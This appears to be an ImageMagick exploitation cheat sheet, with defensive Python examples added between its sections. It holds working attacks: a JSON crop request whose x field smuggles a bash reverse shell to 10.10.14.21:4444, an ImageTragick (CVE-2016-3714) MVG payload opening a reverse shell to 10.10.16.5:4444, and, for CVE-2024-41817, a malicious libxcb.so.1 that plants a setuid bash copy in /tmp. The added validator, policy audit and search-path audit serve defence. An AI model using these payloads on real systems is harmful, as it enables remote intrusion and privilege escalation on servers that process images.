ImageMagick
Check Version
magick -version

Arbitrary Code Execution via crop

{
  "imageId": "9192ab80-55e4-4a28-b1d7-5d7aed0b7fdd",
  "transformType": "crop",
  "params": {
    "x": "|| bash -c 'sh -i >& /dev/tcp/10.10.14.21/4444 0>&1'||",
    "y": 0,
    "width": 3164,
    "height": 4430
  }
}

Command injection via fill - CVE-2016-3714
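An added defensive example (not code from the original page or from ImageMagick) covering the crop request above and the coder-policy mitigation for CVE-2016-3714 in this section: the first function validates the crop parameters as plain non-negative integers and builds an argv list, so the x value never reaches a shell; the second audits a policy.xml text for the coder entries the ImageTragick advisory told administrators to disable. The function names, the argv layout, the sample request and the sample policy files are assumptions constructed for the example.

```python
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Added example, not code from the page or from ImageMagick. Two defensive
# checks: strict validation of the crop parameters from the JSON request above
# (the x field is where the shell payload was smuggled in), and an audit of
# ImageMagick's policy.xml for the coder restrictions published as the
# CVE-2016-3714 (ImageTragick) mitigation. Function names are assumptions.

# The bug class behind the crop injection: untrusted values formatted into a
# string that is later handed to a shell. Shown for contrast only; never run it.
def build_crop_command_unsafe(params: dict) -> str:
    geometry = f"{params['width']}x{params['height']}+{params['x']}+{params['y']}"
    return f"magick in.png -crop {geometry} out.png"

def build_crop_argv(params: dict) -> list[str]:
    """Validate crop params and return an argv list for subprocess (no shell).

    Each field must be a plain non-negative integer (int or digit string);
    anything else, including the '|| bash -c ...' value from the request above,
    raises ValueError. Width and height must also be positive.
    """
    clean: dict[str, int] = {}
    for key in ("x", "y", "width", "height"):
        value = params.get(key)
        if isinstance(value, bool) or not isinstance(value, (int, str)):
            raise ValueError(f"{key}: unexpected type {type(value).__name__}")
        text = str(value)
        if not re.fullmatch(r"[0-9]{1,6}", text):
            raise ValueError(f"{key}: not a plain non-negative integer: {text!r}")
        clean[key] = int(text)
    if clean["width"] == 0 or clean["height"] == 0:
        raise ValueError("width and height must be positive")
    geometry = f"{clean['width']}x{clean['height']}+{clean['x']}+{clean['y']}"
    # An argv list never passes through /bin/sh, so shell metacharacters are inert.
    return ["magick", "in.png", "-crop", geometry, "out.png"]

def rejects_crop_params(params: dict) -> bool:
    """True when build_crop_argv refuses the request."""
    try:
        build_crop_argv(params)
    except ValueError:
        return True
    return False

# Constructed stand-in for the request shown above; the x value mimics its shape
# with a harmless string in place of the reverse-shell payload.
CROP_REQUEST = {"x": "|| echo injected ||", "y": 0, "width": 3164, "height": 4430}

# Coders the ImageTragick advisory recommended disabling with rights="none".
REQUIRED_DENIED = {
    ("coder", "EPHEMERAL"), ("coder", "URL"), ("coder", "HTTPS"),
    ("coder", "MVG"), ("coder", "MSL"), ("coder", "TEXT"),
    ("coder", "SHOW"), ("coder", "WIN"), ("coder", "PLT"),
}

def audit_policy(policy_xml: str) -> set[tuple[str, str]]:
    """Return the (domain, pattern) pairs from REQUIRED_DENIED that policy.xml
    does not set to rights="none"; an empty set means the mitigation is in place."""
    root = ET.fromstring(policy_xml)
    denied = {
        (p.get("domain", ""), p.get("pattern", ""))
        for p in root.iter("policy")
        if p.get("rights", "").strip().lower() == "none"
    }
    return REQUIRED_DENIED - denied

# Constructed policy files for the check.
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="coder" rights="none" pattern="TEXT"/>
  <policy domain="coder" rights="none" pattern="SHOW"/>
  <policy domain="coder" rights="none" pattern="WIN"/>
  <policy domain="coder" rights="none" pattern="PLT"/>
</policymap>"""

WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="read" pattern="MVG"/>
</policymap>"""

if __name__ == "__main__":
    print(build_crop_argv({"x": 10, "y": "20", "width": 3164, "height": 4430}))
    print("payload rejected:", rejects_crop_params(CROP_REQUEST))
    print("hardened policy missing:", sorted(audit_policy(HARDENED_POLICY)))
    print("weak policy missing:", sorted(audit_policy(WEAK_POLICY)))
```

Pair the argv builder with subprocess.run(argv) rather than a shell string. The policy audit works as a configuration-compliance check on image-processing hosts; it should sit alongside checking the real content of uploads (magic bytes) instead of trusting the declared extension, because the MVG payload in this section travels in a file that claims to be another format.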
The vulnerability primarily affects the following formats:
SVG, EPS, MVG, PDF, XML
push graphic-context
viewbox 0 0 640 480
fill 'url(https://1.1.1.1/tokyo.jpg"|bash -i >& /dev/tcp/10.10.16.5/4444 0>&1;echo "yay)'
pop graphic-context

Arbitrary Code Execution in `AppImage` version - CVE-2024-41817
Read about the POC
Build the shared library
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* constructor runs as soon as the loader maps the library, before main() */
__attribute__((constructor)) void init(){
system("id");
exit(0);
}
EOF

Check that running magick runs id
magick /dev/null /dev/null

Replace id with a copy of bash
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* same constructor, now copying bash and marking the copy setuid/setgid */
__attribute__((constructor)) void init(){
system("cp /bin/bash /tmp/tokyo; chmod 6777 /tmp/tokyo");
exit(0);
}
EOF

In case you need to wait
sleep 45; ls -l /tmp/tokyo
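An added example, not from the page or from the ImageMagick project, auditing the search-path variables behind this section's vulnerability. According to the published advisory for CVE-2024-41817, the AppImage launcher could set LD_LIBRARY_PATH and MAGICK_CONFIGURE_PATH with an empty path component, which the loader treats as the current working directory; that is what lets a libxcb.so.1 like the one built above get picked up. The check flags empty or relative components in a process environment. The choice of variables and the function names are my assumptions, and the sample environment is constructed.

```python
from __future__ import annotations

import os

# Added example, not from the page. Per the published advisory for
# CVE-2024-41817, the ImageMagick AppImage launcher could set LD_LIBRARY_PATH and
# MAGICK_CONFIGURE_PATH with an empty path component; an empty component is
# resolved against the current working directory, which is why a libxcb.so.1
# placed where magick is run gets loaded. This audit flags that class of
# weakness in a process environment. Variable list and names are assumptions.

SEARCH_PATH_VARS = ("LD_LIBRARY_PATH", "MAGICK_CONFIGURE_PATH")

def unsafe_components(value: str) -> list[str]:
    """Return the components of a colon-separated search path that are resolved
    relative to the working directory: empty entries (from a leading, trailing
    or doubled colon) and relative paths. Absolute entries are not reported.
    A wholly empty value adds no directories at all and is therefore clean."""
    if value == "":
        return []
    return [part for part in value.split(":") if not os.path.isabs(part)]

def audit_environment(env: dict[str, str]) -> dict[str, list[str]]:
    """Map each search-path variable present in env to its unsafe components."""
    return {name: unsafe_components(env[name]) for name in SEARCH_PATH_VARS if name in env}

def environment_is_safe(env: dict[str, str]) -> bool:
    """True when no audited variable carries an empty or relative component."""
    return all(not parts for parts in audit_environment(env).values())

# Constructed environment mimicking a launcher that prepends its bundled lib
# directory to an unset variable, leaving a trailing empty component.
APPIMAGE_ENV = {
    "LD_LIBRARY_PATH": "/tmp/.mount_magick/usr/lib:",
    "MAGICK_CONFIGURE_PATH": "/tmp/.mount_magick/usr/lib/ImageMagick-7/config-Q16HDRI:",
}

if __name__ == "__main__":
    # Audit the live environment this script was started in.
    for name, parts in audit_environment(dict(os.environ)).items():
        print(name, "unsafe components:", parts or "none")
    print("constructed AppImage env safe:", environment_is_safe(APPIMAGE_ENV))
```

Run it from the environment the launcher creates (for example from a wrapper script that invokes magick) and alert on any finding. As an endpoint detection cue, a shared object named after a system library such as libxcb.so.1 appearing in a working directory outside the system library paths, shortly before a magick process starts, is worth investigating.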